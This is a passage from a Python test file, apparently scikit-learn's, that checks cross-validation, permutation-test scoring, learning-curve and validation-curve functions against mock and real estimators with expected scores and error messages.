scores = cross_val_score(clf, X.tolist(), y2.tolist())
clf = CheckingClassifier(check_y=list_check)
scores = cross_val_score(clf, X, y2.tolist())
assert_raises(ValueError, cross_val_score, clf, X, y2, scoring="sklearn")
# test with 3d X and
X_3d = X[:, :, np.newaxis]
clf = MockClassifier(allow_nd=True)
scores = cross_val_score(clf, X_3d, y2)
clf = MockClassifier(allow_nd=False)
assert_raises(ValueError, cross_val_score, clf, X_3d, y2)
def test_cross_validate_invalid_scoring_param():
X, y = make_classification(random_state=0)
estimator = MockClassifier()
# Test the errors
error_message_regexp = ".*must be unique strings.*"
# List/tuple of callables should raise a message advising users to use
# dict of names to callables mapping
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=(make_scorer(precision_score),
make_scorer(accuracy_score)))
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=(make_scorer(precision_score),))
# So should empty lists/tuples
assert_raises_regex(ValueError, error_message_regexp + "Empty list.*",
cross_validate, estimator, X, y, scoring=())
# So should duplicated entries
assert_raises_regex(ValueError, error_message_regexp + "Duplicate.*",
cross_validate, estimator, X, y,
scoring=('f1_micro', 'f1_micro'))
# Nested Lists should raise a generic error message
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=[[make_scorer(precision_score)]])
error_message_regexp = (".*should either be.*string or callable.*for "
"single.*.*dict.*for multi.*")
# Empty dict should raise invalid scoring error
assert_raises_regex(ValueError, "An empty dict",
cross_validate, estimator, X, y, scoring=(dict()))
# And so should any other invalid entry
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y, scoring=5)
multiclass_scorer = make_scorer(precision_recall_fscore_support)
# Multiclass Scorers that return multiple values are not supported yet
assert_raises_regex(ValueError,
"Classification metrics can't handle a mix of "
"binary and continuous targets",
cross_validate, estimator, X, y,
scoring=multiclass_scorer)
assert_raises_regex(ValueError,
"Classification metrics can't handle a mix of "
"binary and continuous targets",
cross_validate, estimator, X, y,
scoring={"foo": multiclass_scorer})
multivalued_scorer = make_scorer(confusion_matrix)
# Multiclass Scorers that return multiple values are not supported yet
assert_raises_regex(ValueError, "scoring must return a number, got",
cross_validate, SVC(), X, y,
scoring=multivalued_scorer)
assert_raises_regex(ValueError, "scoring must return a number, got",
cross_validate, SVC(), X, y,
scoring={"foo": multivalued_scorer})
assert_raises_regex(ValueError, "'mse' is not a valid scoring value.",
cross_validate, SVC(), X, y, scoring="mse")
def test_cross_validate():
# Compute train and test mse/r2 scores
cv = KFold(n_splits=5)
# Regression
X_reg, y_reg = make_regression(n_samples=30, random_state=0)
reg = Ridge(random_state=0)
# Classification
X_clf, y_clf = make_classification(n_samples=30, random_state=0)
clf = SVC(kernel="linear", random_state=0)
for X, y, est in ((X_reg, y_reg, reg), (X_clf, y_clf, clf)):
# It's okay to evaluate regression metrics on classification too
mse_scorer = check_scoring(est, 'neg_mean_squared_error')
r2_scorer = check_scoring(est, 'r2')
train_mse_scores = []
test_mse_scores = []
train_r2_scores = []
test_r2_scores = []
for train, test in cv.split(X, y):
est = clone(reg).fit(X[train], y[train])
train_mse_scores.append(mse_scorer(est, X[train], y[train]))
train_r2_scores.append(r2_scorer(est, X[train], y[train]))
test_mse_scores.append(mse_scorer(est, X[test], y[test]))
test_r2_scores.append(r2_scorer(est, X[test], y[test]))
train_mse_scores = np.array(train_mse_scores)
test_mse_scores = np.array(test_mse_scores)
train_r2_scores = np.array(train_r2_scores)
test_r2_scores = np.array(test_r2_scores)
scores = (train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores)
yield check_cross_validate_single_metric, est, X, y, scores
yield check_cross_validate_multi_metric, est, X, y, scores
def test_cross_validate_return_train_score_warn():
# Test that warnings are raised. Will be removed in 0.21
X, y = make_classification(random_state=0)
estimator = MockClassifier()
result = {}
for val in [False, True, 'warn']:
result[val] = assert_no_warnings(cross_validate, estimator, X, y,
return_train_score=val)
msg = (
'You are accessing a training score ({!r}), '
'which will not be available by default '
'any more in 0.21. If you need training scores, '
'please set return_train_score=True').format('train_score')
train_score = assert_warns_message(FutureWarning, msg,
result['warn'].get, 'train_score')
assert np.allclose(train_score, result[True]['train_score'])
assert 'train_score' not in result[False]
def check_cross_validate_single_metric(clf, X, y, scores):
(train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores) = scores
# Test single metric evaluation when scoring is string or singleton list
for (return_train_score, dict_len) in ((True, 4), (False, 3)):
# Single metric passed as a string
if return_train_score:
# It must be True by default
mse_scores_dict = cross_validate(clf, X, y, cv=5,
scoring='neg_mean_squared_error')
assert_array_almost_equal(mse_scores_dict['train_score'],
train_mse_scores)
else:
mse_scores_dict = cross_validate(clf, X, y, cv=5,
scoring='neg_mean_squared_error',
return_train_score=False)
assert_true(isinstance(mse_scores_dict, dict))
assert_equal(len(mse_scores_dict), dict_len)
assert_array_almost_equal(mse_scores_dict['test_score'],
test_mse_scores)
# Single metric passed as a list
if return_train_score:
# It must be True by default
r2_scores_dict = cross_validate(clf, X, y, cv=5, scoring=['r2'])
assert_array_almost_equal(r2_scores_dict['train_r2'],
train_r2_scores)
else:
r2_scores_dict = cross_validate(clf, X, y, cv=5, scoring=['r2'],
return_train_score=False)
assert_true(isinstance(r2_scores_dict, dict))
assert_equal(len(r2_scores_dict), dict_len)
assert_array_almost_equal(r2_scores_dict['test_r2'], test_r2_scores)
def check_cross_validate_multi_metric(clf, X, y, scores):
# Test multimetric evaluation when scoring is a list / dict
(train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores) = scores
all_scoring = (('r2', 'neg_mean_squared_error'),
{'r2': make_scorer(r2_score),
'neg_mean_squared_error': 'neg_mean_squared_error'})
keys_sans_train = set(('test_r2', 'test_neg_mean_squared_error',
'fit_time', 'score_time'))
keys_with_train = keys_sans_train.union(
set(('train_r2', 'train_neg_mean_squared_error')))
for return_train_score in (True, False):
for scoring in all_scoring:
if return_train_score:
# return_train_score must be True by default
cv_results = cross_validate(clf, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(cv_results['train_r2'],
train_r2_scores)
assert_array_almost_equal(
cv_results['train_neg_mean_squared_error'],
train_mse_scores)
else:
cv_results = cross_validate(clf, X, y, cv=5, scoring=scoring,
return_train_score=False)
assert_true(isinstance(cv_results, dict))
assert_equal(set(cv_results.keys()),
keys_with_train if return_train_score
else keys_sans_train)
assert_array_almost_equal(cv_results['test_r2'], test_r2_scores)
assert_array_almost_equal(
cv_results['test_neg_mean_squared_error'], test_mse_scores)
# Make sure all the arrays are of np.ndarray type
assert type(cv_results['test_r2']) == np.ndarray
assert (type(cv_results['test_neg_mean_squared_error']) ==
np.ndarray)
assert type(cv_results['fit_time']) == np.ndarray
assert type(cv_results['score_time']) == np.ndarray
# Ensure all the times are within sane limits
assert np.all(cv_results['fit_time'] >= 0)
assert np.all(cv_results['fit_time'] < 10)
assert np.all(cv_results['score_time'] >= 0)
assert np.all(cv_results['score_time'] < 10)
def test_cross_val_score_predict_groups():
# Check if ValueError (when groups is None) propagates to cross_val_score
# and cross_val_predict
# And also check if groups is correctly passed to the cv object
X, y = make_classification(n_samples=20, n_classes=2, random_state=0)
clf = SVC(kernel="linear")
group_cvs = [LeaveOneGroupOut(), LeavePGroupsOut(2), GroupKFold(),
GroupShuffleSplit()]
for cv in group_cvs:
assert_raise_message(ValueError,
"The 'groups' parameter should not be None.",
cross_val_score, estimator=clf, X=X, y=y, cv=cv)
assert_raise_message(ValueError,
"The 'groups' parameter should not be None.",
cross_val_predict, estimator=clf, X=X, y=y, cv=cv)
def test_cross_val_score_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
# 3 fold cross val is used so we need atleast 3 samples per class
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_score(clf, X_df, y_ser)
def test_cross_val_score_mask():
# test that cross_val_score works with boolean masks
svm = SVC(kernel="linear")
iris = load_iris()
X, y = iris.data, iris.target
kfold = KFold(5)
scores_indices = cross_val_score(svm, X, y, cv=kfold)
kfold = KFold(5)
cv_masks = []
for train, test in kfold.split(X, y):
mask_train = np.zeros(len(y), dtype=np.bool)
mask_test = np.zeros(len(y), dtype=np.bool)
mask_train[train] = 1
mask_test[test] = 1
cv_masks.append((train, test))
scores_masks = cross_val_score(svm, X, y, cv=cv_masks)
assert_array_equal(scores_indices, scores_masks)
def test_cross_val_score_precomputed():
# test for svm with precomputed kernel
svm = SVC(kernel="precomputed")
iris = load_iris()
X, y = iris.data, iris.target
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(svm, linear_kernel, y)
svm = SVC(kernel="linear")
score_linear = cross_val_score(svm, X, y)
assert_array_almost_equal(score_precomputed, score_linear)
# test with callable
svm = SVC(kernel=lambda x, y: np.dot(x, y.T))
score_callable = cross_val_score(svm, X, y)
assert_array_almost_equal(score_precomputed, score_callable)
# Error raised for non-square X
svm = SVC(kernel="precomputed")
assert_raises(ValueError, cross_val_score, svm, X, y)
# test error is raised when the precomputed kernel is not array-like
# or sparse
assert_raises(ValueError, cross_val_score, svm,
linear_kernel.tolist(), y)
def test_cross_val_score_fit_params():
clf = MockClassifier()
n_samples = X.shape[0]
n_classes = len(np.unique(y))
W_sparse = coo_matrix((np.array([1]), (np.array([1]), np.array([0]))),
shape=(10, 1))
P_sparse = coo_matrix(np.eye(5))
DUMMY_INT = 42
DUMMY_STR = '42'
DUMMY_OBJ = object()
def assert_fit_params(clf):
# Function to test that the values are passed correctly to the
# classifier arguments for non-array type
assert_equal(clf.dummy_int, DUMMY_INT)
assert_equal(clf.dummy_str, DUMMY_STR)
assert_equal(clf.dummy_obj, DUMMY_OBJ)
fit_params = {'sample_weight': np.ones(n_samples),
'class_prior': np.ones(n_classes) / n_classes,
'sparse_sample_weight': W_sparse,
'sparse_param': P_sparse,
'dummy_int': DUMMY_INT,
'dummy_str': DUMMY_STR,
'dummy_obj': DUMMY_OBJ,
'callback': assert_fit_params}
cross_val_score(clf, X, y, fit_params=fit_params)
def test_cross_val_score_score_func():
clf = MockClassifier()
_score_func_args = []
def score_func(y_test, y_predict):
_score_func_args.append((y_test, y_predict))
return 1.0
with warnings.catch_warnings(record=True):
scoring = make_scorer(score_func)
score = cross_val_score(clf, X, y, scoring=scoring, cv=3)
assert_array_equal(score, [1.0, 1.0, 1.0])
# Test that score function is called only 3 times (for cv=3)
assert len(_score_func_args) == 3
def test_cross_val_score_errors():
class BrokenEstimator:
pass
assert_raises(TypeError, cross_val_score, BrokenEstimator(), X)
def test_cross_val_score_with_score_func_classification():
iris = load_iris()
clf = SVC(kernel='linear')
# Default score (should be the accuracy score)
scores = cross_val_score(clf, iris.data, iris.target, cv=5)
assert_array_almost_equal(scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# Correct classification score (aka. zero / one score) - should be the
# same as the default estimator score
zo_scores = cross_val_score(clf, iris.data, iris.target,
scoring="accuracy", cv=5)
assert_array_almost_equal(zo_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# F1 score (class are balanced so f1_score should be equal to zero/one
# score
f1_scores = cross_val_score(clf, iris.data, iris.target,
scoring="f1_weighted", cv=5)
assert_array_almost_equal(f1_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
def test_cross_val_score_with_score_func_regression():
X, y = make_regression(n_samples=30, n_features=20, n_informative=5,
random_state=0)
reg = Ridge()
# Default score of the Ridge regression estimator
scores = cross_val_score(reg, X, y, cv=5)
assert_array_almost_equal(scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# R2 score (aka. determination coefficient) - should be the
# same as the default estimator score
r2_scores = cross_val_score(reg, X, y, scoring="r2", cv=5)
assert_array_almost_equal(r2_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# Mean squared error; this is a loss function, so "scores" are negative
neg_mse_scores = cross_val_score(reg, X, y, cv=5,
scoring="neg_mean_squared_error")
expected_neg_mse = np.array([-763.07, -553.16, -274.38, -273.26, -1681.99])
assert_array_almost_equal(neg_mse_scores, expected_neg_mse, 2)
# Explained variance
scoring = make_scorer(explained_variance_score)
ev_scores = cross_val_score(reg, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(ev_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
def test_permutation_score():
iris = load_iris()
X = iris.data
X_sparse = coo_matrix(X)
y = iris.target
svm = SVC(kernel='linear')
cv = StratifiedKFold(2)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_greater(score, 0.9)
assert_almost_equal(pvalue, 0.0, 1)
score_group, _, pvalue_group = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy",
groups=np.ones(y.size), random_state=0)
assert_true(score_group == score)
assert_true(pvalue_group == pvalue)
# check that we obtain the same results with a sparse representation
svm_sparse = SVC(kernel='linear')
cv_sparse = StratifiedKFold(2)
score_group, _, pvalue_group = permutation_test_score(
svm_sparse, X_sparse, y, n_permutations=30, cv=cv_sparse,
scoring="accuracy", groups=np.ones(y.size), random_state=0)
assert_true(score_group == score)
assert_true(pvalue_group == pvalue)
# test with custom scoring object
def custom_score(y_true, y_pred):
return (((y_true == y_pred).sum() - (y_true != y_pred).sum()) /
y_true.shape[0])
scorer = make_scorer(custom_score)
score, _, pvalue = permutation_test_score(
svm, X, y, n_permutations=100, scoring=scorer, cv=cv, random_state=0)
assert_almost_equal(score, .93, 2)
assert_almost_equal(pvalue, 0.01, 3)
# set random y
y = np.mod(np.arange(len(y)), 3)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_less(score, 0.5)
assert_greater(pvalue, 0.2)
def test_permutation_test_score_allow_nans():
# Check that permutation_test_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
permutation_test_score(p, X, y, cv=5)
def test_cross_val_score_allow_nans():
# Check that cross_val_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
cross_val_score(p, X, y, cv=5)
def test_cross_val_score_multilabel():
X = np.array([[-3, 4], [2, 4], [3, 3], [0, 2], [-3, 1],
[-2, 1], [0, 0], [-2, -1], [-1, -2], [1, -2]])
y = np.array([[1, 1], [0, 1], [0, 1], [0, 1], [1, 1],
[0, 1], [1, 0], [1, 1], [1, 0], [0, 0]])
clf = KNeighborsClassifier(n_neighbors=1)
scoring_micro = make_scorer(precision_score, average='micro')
scoring_macro = make_scorer(precision_score, average='macro')
scoring_samples = make_scorer(precision_score, average='samples')
score_micro = cross_val_score(clf, X, y, scoring=scoring_micro, cv=5)
score_macro = cross_val_score(clf, X, y, scoring=scoring_macro, cv=5)
score_samples = cross_val_score(clf, X, y, scoring=scoring_samples, cv=5)
assert_almost_equal(score_micro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 3])
assert_almost_equal(score_macro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
assert_almost_equal(score_samples, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
def test_cross_val_predict():
boston = load_boston()
X, y = boston.data, boston.target
cv = KFold()
est = Ridge()
# Naive loop (should be same as cross_val_predict):
preds2 = np.zeros_like(y)
for train, test in cv.split(X, y):
est.fit(X[train], y[train])
preds2[test] = est.predict(X[test])
preds = cross_val_predict(est, X, y, cv=cv)
assert_array_almost_equal(preds, preds2)
preds = cross_val_predict(est, X, y)
assert_equal(len(preds), len(y))
cv = LeaveOneOut()
preds = cross_val_predict(est, X, y, cv=cv)
assert_equal(len(preds), len(y))
Xsp = X.copy()
Xsp *= (Xsp > np.median(Xsp))
Xsp = coo_matrix(Xsp)
preds = cross_val_predict(est, Xsp, y)
assert_array_almost_equal(len(preds), len(y))
preds = cross_val_predict(KMeans(), X)
assert_equal(len(preds), len(y))
class BadCV():
def split(self, X, y=None, groups=None):
for i in range(4):
yield np.array([0, 1, 2, 3]), np.array([4, 5, 6, 7, 8])
assert_raises(ValueError, cross_val_predict, est, X, y, cv=BadCV())
X, y = load_iris(return_X_y=True)
warning_message = ('Number of classes in training fold (2) does '
'not match total number of classes (3). '
'Results may not be appropriate for your use case.')
assert_warns_message(RuntimeWarning, warning_message,
cross_val_predict, LogisticRegression(),
X, y, method='predict_proba', cv=KFold(2))
def test_cross_val_predict_decision_function_shape():
X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
preds = cross_val_predict(LogisticRegression(), X, y,
method='decision_function')
assert_equal(preds.shape, (50,))
X, y = load_iris(return_X_y=True)
preds = cross_val_predict(LogisticRegression(), X, y,
method='decision_function')
assert_equal(preds.shape, (150, 3))
# This specifically tests imbalanced splits for binary
# classification with decision_function. This is only
# applicable to classifiers that can be fit on a single
# class.
X = X[:100]
y = y[:100]
assert_raise_message(ValueError,
'Only 1 class/es in training fold, this'
' is not supported for decision_function'
' with imbalanced folds. To fix '
'this, use a cross-validation technique '
'resulting in properly stratified folds',
cross_val_predict, RidgeClassifier(), X, y,
method='decision_function', cv=KFold(2))
X, y = load_digits(return_X_y=True)
est = SVC(kernel='linear', decision_function_shape='ovo')
preds = cross_val_predict(est,
X, y,
method='decision_function')
assert_equal(preds.shape, (1797, 45))
ind = np.argsort(y)
X, y = X[ind], y[ind]
assert_raises_regex(ValueError,
'Output shape \(599L?, 21L?\) of decision_function '
'does not match number of classes \(7\) in fold. '
'Irregular decision_function .*',
cross_val_predict, est, X, y,
cv=KFold(n_splits=3), method='decision_function')
def test_cross_val_predict_predict_proba_shape():
X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_proba')
assert_equal(preds.shape, (50, 2))
X, y = load_iris(return_X_y=True)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_proba')
assert_equal(preds.shape, (150, 3))
def test_cross_val_predict_predict_log_proba_shape():
X, y = make_classification(n_classes=2, n_samples=50, random_state=0)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_log_proba')
assert_equal(preds.shape, (50, 2))
X, y = load_iris(return_X_y=True)
preds = cross_val_predict(LogisticRegression(), X, y,
method='predict_log_proba')
assert_equal(preds.shape, (150, 3))
def test_cross_val_predict_input_types():
iris = load_iris()
X, y = iris.data, iris.target
X_sparse = coo_matrix(X)
multioutput_y = np.column_stack([y, y[::-1]])
clf = Ridge(fit_intercept=False, random_state=0)
# 3 fold cv is used --> atleast 3 samples per class
# Smoke test
predictions = cross_val_predict(clf, X, y)
assert_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_equal(predictions.shape, (150, 2))
predictions = cross_val_predict(clf, X_sparse, y)
assert_array_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_array_equal(predictions.shape, (150, 2))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
predictions = cross_val_predict(clf, X.tolist(), y.tolist())
clf = CheckingClassifier(check_y=list_check)
predictions = cross_val_predict(clf, X, y.tolist())
# test with X and y as list and non empty method
predictions = cross_val_predict(LogisticRegression(), X.tolist(),
y.tolist(), method='decision_function')
predictions = cross_val_predict(LogisticRegression(), X,
y.tolist(), method='decision_function')
# test with 3d X and
X_3d = X[:, :, np.newaxis]
check_3d = lambda x: x.ndim == 3
clf = CheckingClassifier(check_X=check_3d)
predictions = cross_val_predict(clf, X_3d, y)
assert_array_equal(predictions.shape, (150,))
def test_cross_val_predict_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_predict(clf, X_df, y_ser)
def test_cross_val_score_sparse_fit_params():
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
fit_params = {'sparse_sample_weight': coo_matrix(np.eye(X.shape[0]))}
a = cross_val_score(clf, X, y, fit_params=fit_params)
assert_array_equal(a, np.ones(3))
def test_learning_curve():
n_samples = 30
n_splits = 3
X, y = make_classification(n_samples=n_samples, n_features=1,
n_informative=1, n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(n_samples * ((n_splits - 1) / n_splits))
for shuffle_train in [False, True]:
with warnings.catch_warnings(record=True) as w:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=KFold(n_splits=n_splits),
train_sizes=np.linspace(0.1, 1.0, 10),
shuffle=shuffle_train)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_equal(train_scores.shape, (10, 3))
assert_equal(test_scores.shape, (10, 3))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
# Test a custom cv splitter that can iterate only once
with warnings.catch_warnings(record=True) as w:
train_sizes2, train_scores2, test_scores2 = learning_curve(
estimator, X, y,
cv=OneTimeSplitter(n_splits=n_splits, n_samples=n_samples),
train_sizes=np.linspace(0.1, 1.0, 10),
shuffle=shuffle_train)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores2, train_scores)
assert_array_almost_equal(test_scores2, test_scores)
def test_learning_curve_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_verbose():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
train_sizes, train_scores, test_scores = \
learning_curve(estimator, X, y, cv=3, verbose=1)
finally:
out = sys.stdout.getvalue()
sys.stdout.close()
sys.stdout = old_stdout
assert("[learning_curve]" in out)
def test_learning_curve_incremental_learning_not_possible():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
# The mockup does not have partial_fit()
estimator = MockImprovingEstimator(1)
assert_raises(ValueError, learning_curve, estimator, X, y,
exploit_incremental_learning=True)
def test_learning_curve_incremental_learning():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
for shuffle_train in [False, True]:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10), shuffle=shuffle_train)
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_incremental_learning_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_batch_and_incremental_learning_are_equal():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
train_sizes = np.linspace(0.2, 1.0, 5)
estimator = PassiveAggressiveClassifier(max_iter=1, tol=None,
shuffle=False)
train_sizes_inc, train_scores_inc, test_scores_inc = \
learning_curve(
estimator, X, y, train_sizes=train_sizes,
cv=3, exploit_incremental_learning=True)
train_sizes_batch, train_scores_batch, test_scores_batch = \
learning_curve(
estimator, X, y, cv=3, train_sizes=train_sizes,
exploit_incremental_learning=False)
assert_array_equal(train_sizes_inc, train_sizes_batch)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_learning_curve_n_sample_range_out_of_bounds():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.0, 1.0])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.1, 1.1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 20])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[1, 21])
def test_learning_curve_remove_duplicate_sample_sizes():
X, y = make_classification(n_samples=3, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(2)
train_sizes, _, _ = assert_warns(
RuntimeWarning, learning_curve, estimator, X, y, cv=3,
train_sizes=np.linspace(0.33, 1.0, 3))
assert_array_equal(train_sizes, [1, 2])
def test_learning_curve_with_boolean_indices():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
cv = KFold(n_splits=3)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_with_shuffle():
# Following test case was designed this way to verify the code
# changes made in pull request: #7506.
X = np.array([[1, 2], [3, 4], [5, 6], [7, 8], [11, 12], [13, 14], [15, 16],
[17, 18], [19, 20], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18]])
y = np.array([1, 1, 1, 2, 3, 4, 1, 1, 2, 3, 4, 1, 2, 3, 4])
groups = np.array([1, 1, 1, 1, 1, 1, 3, 3, 3, 3, 3, 4, 4, 4, 4])
# Splits on these groups fail without shuffle as the first iteration
# of the learning curve doesn't contain label 4 in the training set.
estimator = PassiveAggressiveClassifier(max_iter=5, tol=None,
shuffle=False)
cv = GroupKFold(n_splits=2)
train_sizes_batch, train_scores_batch, test_scores_batch = learning_curve(
estimator, X, y, cv=cv, n_jobs=1, train_sizes=np.linspace(0.3, 1.0, 3),
groups=groups, shuffle=True, random_state=2)
assert_array_almost_equal(train_scores_batch.mean(axis=1),
np.array([0.75, 0.3, 0.36111111]))
assert_array_almost_equal(test_scores_batch.mean(axis=1),
np.array([0.36111111, 0.25, 0.25]))
assert_raises(ValueError, learning_curve, estimator, X, y, cv=cv, n_jobs=1,
train_sizes=np.linspace(0.3, 1.0, 3), groups=groups)
train_sizes_inc, train_scores_inc, test_scores_inc = learning_curve(
estimator, X, y, cv=cv, n_jobs=1, train_sizes=np.linspace(0.3, 1.0, 3),
groups=groups, shuffle=True, random_state=2,
exploit_incremental_learning=True)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_validation_curve():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(0, 1, 10)
with warnings.catch_warnings(record=True) as w:
train_scores, test_scores = validation_curve(
MockEstimatorWithParameter(), X, y, param_name="param",
param_range=param_range, cv=2
)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores.mean(axis=1), param_range)
assert_array_almost_equal(test_scores.mean(axis=1), 1 - param_range)
def test_validation_curve_clone_estimator():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(1, 0, 10)
_, _ = validation_curve(
